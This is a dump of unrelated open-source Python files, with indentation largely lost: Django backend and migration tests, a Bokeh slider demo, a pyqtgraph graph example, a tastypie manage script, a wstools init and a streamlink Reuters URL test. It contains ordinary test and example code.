with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# The tests below also verify that the raised exception is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, it should be possible to write bad data without IntegrityErrors being raised.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using a context manager), it should be possible to write bad data without IntegrityErrors being raised.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got a different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as the id for an AutoField should raise an exception in MySQL, because
MySQL does not allow zero as an autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").remote_field.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(SimpleTestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
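# Editor's note: a hedged, minimal sketch (not Django's implementation) of the
# behaviour format_number is exercised for above: quantize to `decimal_places`
# within a context of `max_digits` significant digits, and trap decimal.Rounded
# only when decimal_places is None, so precision loss surfaces as Rounded
# exactly in the assertRaises cases shown in test_format_number.
def _sketch_format_number(value, max_digits, decimal_places):
    import decimal
    context = decimal.getcontext().copy()
    if max_digits is not None:
        context.prec = max_digits
    if decimal_places is not None:
        value = value.quantize(
            decimal.Decimal(1).scaleb(-decimal_places), context=context)
    else:
        context.traps[decimal.Rounded] = True
        value = context.create_decimal(value)
    return '{:f}'.format(value)
# e.g. _sketch_format_number(Decimal('0.1234567890'), 12, 5) == '0.12346'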
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
mthornhill/django-tastypie
|
refs/heads/master
|
tests/manage_core.py
|
20
|
#!/usr/bin/env python
import os, sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings_core")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
rs2/bokeh
|
refs/heads/master
|
examples/app/sliders.py
|
7
|
''' Present an interactive function explorer with slider widgets.
Scrub the sliders to change the properties of the ``sin`` curve, or
type into the title text box to update the title of the plot.
Use the ``bokeh serve`` command to run the example by executing:
bokeh serve sliders.py
at your command prompt. Then navigate to the URL
http://localhost:5006/sliders
in your browser.
'''
import numpy as np
from bokeh.io import curdoc
from bokeh.layouts import row, widgetbox
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import Slider, TextInput
from bokeh.plotting import figure
# Set up data
N = 200
x = np.linspace(0, 4*np.pi, N)
y = np.sin(x)
source = ColumnDataSource(data=dict(x=x, y=y))
# Set up plot
plot = figure(plot_height=400, plot_width=400, title="my sine wave",
tools="crosshair,pan,reset,save,wheel_zoom",
x_range=[0, 4*np.pi], y_range=[-2.5, 2.5])
plot.line('x', 'y', source=source, line_width=3, line_alpha=0.6)
# Set up widgets
text = TextInput(title="title", value='my sine wave')
offset = Slider(title="offset", value=0.0, start=-5.0, end=5.0, step=0.1)
amplitude = Slider(title="amplitude", value=1.0, start=-5.0, end=5.0, step=0.1)
phase = Slider(title="phase", value=0.0, start=0.0, end=2*np.pi)
freq = Slider(title="frequency", value=1.0, start=0.1, end=5.1, step=0.1)
# Set up callbacks
def update_title(attrname, old, new):
plot.title.text = text.value
text.on_change('value', update_title)
def update_data(attrname, old, new):
# Get the current slider values
a = amplitude.value
b = offset.value
w = phase.value
k = freq.value
# Generate the new curve
x = np.linspace(0, 4*np.pi, N)
y = a*np.sin(k*x + w) + b
source.data = dict(x=x, y=y)
for w in [offset, amplitude, phase, freq]:
w.on_change('value', update_data)
# Set up layouts and add to document
inputs = widgetbox(text, offset, amplitude, phase, freq)
curdoc().add_root(row(inputs, plot, width=800))
curdoc().title = "Sliders"
|
esuncloud/p2pool
|
refs/heads/master
|
wstools/__init__.py
|
293
|
#! /usr/bin/env python
"""WSDL parsing services package for Web Services for Python."""
ident = "$Id$"
import WSDLTools
import XMLname
import logging
|
devs4v/devs4v-information-retrieval15
|
refs/heads/master
|
project/venv/lib/python2.7/site-packages/django/contrib/auth/migrations/0002_alter_permission_name_max_length.py
|
586
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='permission',
name='name',
field=models.CharField(max_length=255, verbose_name='name'),
),
]
|
jlombacher/pyqtgraph
|
refs/heads/develop
|
examples/CustomGraphItem.py
|
24
|
# -*- coding: utf-8 -*-
"""
Simple example of subclassing GraphItem.
"""
import initExample ## Add path to library (just for examples; you do not need this)
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
w = pg.GraphicsWindow()
w.setWindowTitle('pyqtgraph example: CustomGraphItem')
v = w.addViewBox()
v.setAspectLocked()
class Graph(pg.GraphItem):
def __init__(self):
self.dragPoint = None
self.dragOffset = None
self.textItems = []
pg.GraphItem.__init__(self)
self.scatter.sigClicked.connect(self.clicked)
def setData(self, **kwds):
self.text = kwds.pop('text', [])
self.data = kwds
if 'pos' in self.data:
npts = self.data['pos'].shape[0]
self.data['data'] = np.empty(npts, dtype=[('index', int)])
self.data['data']['index'] = np.arange(npts)
self.setTexts(self.text)
self.updateGraph()
def setTexts(self, text):
for i in self.textItems:
i.scene().removeItem(i)
self.textItems = []
for t in text:
item = pg.TextItem(t)
self.textItems.append(item)
item.setParentItem(self)
def updateGraph(self):
pg.GraphItem.setData(self, **self.data)
for i,item in enumerate(self.textItems):
item.setPos(*self.data['pos'][i])
def mouseDragEvent(self, ev):
if ev.button() != QtCore.Qt.LeftButton:
ev.ignore()
return
if ev.isStart():
# We are already one step into the drag.
# Find the point(s) at the mouse cursor when the button was first
# pressed:
pos = ev.buttonDownPos()
pts = self.scatter.pointsAt(pos)
if len(pts) == 0:
ev.ignore()
return
self.dragPoint = pts[0]
ind = pts[0].data()[0]
self.dragOffset = self.data['pos'][ind] - pos
elif ev.isFinish():
self.dragPoint = None
return
else:
if self.dragPoint is None:
ev.ignore()
return
ind = self.dragPoint.data()[0]
self.data['pos'][ind] = ev.pos() + self.dragOffset
self.updateGraph()
ev.accept()
def clicked(self, pts):
print("clicked: %s" % pts)
g = Graph()
v.addItem(g)
## Define positions of nodes
pos = np.array([
[0,0],
[10,0],
[0,10],
[10,10],
[5,5],
[15,5]
], dtype=float)
## Define the set of connections in the graph
adj = np.array([
[0,1],
[1,3],
[3,2],
[2,0],
[1,5],
[3,5],
])
## Define the symbol to use for each node (this is optional)
symbols = ['o','o','o','o','t','+']
## Define the line style for each connection (this is optional)
lines = np.array([
(255,0,0,255,1),
(255,0,255,255,2),
(255,0,255,255,3),
(255,255,0,255,2),
(255,0,0,255,1),
(255,255,255,255,4),
], dtype=[('red',np.ubyte),('green',np.ubyte),('blue',np.ubyte),('alpha',np.ubyte),('width',float)])
## Define text to show next to each symbol
texts = ["Point %d" % i for i in range(6)]
## Update the graph
g.setData(pos=pos, adj=adj, pen=lines, size=1, symbol=symbols, pxMode=False, text=texts)
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
beardypig/streamlink
|
refs/heads/master
|
tests/plugins/test_reuters.py
|
2
|
import unittest
from streamlink.plugins.reuters import Reuters
class TestPluginReuters(unittest.TestCase):
def test_can_handle_url(self):
should_match = [
'https://uk.reuters.com/video/watch/east-africa-battles-locust-invasion-idOVC2J9BHJ?chan=92jv7sln',
'https://www.reuters.com/livevideo?id=Pdeb',
'https://www.reuters.com/video/watch/baby-yoda-toy-makes-its-big-debut-idOVC1KAO9Z?chan=8adtq7aq',
'https://www.reuters.tv/l/PFJx/2019/04/19/way-of-the-cross-ritual-around-notre-dame-cathedral',
'https://www.reuters.tv/l/PFcO/2019/04/10/first-ever-black-hole-image-released-astrophysics-milestone',
'https://www.reuters.tv/p/WoRwM1a00y8',
]
for url in should_match:
self.assertTrue(Reuters.can_handle_url(url), url)
should_not_match = [
'https://example.com/index.html',
]
for url in should_not_match:
self.assertFalse(Reuters.can_handle_url(url), url)
|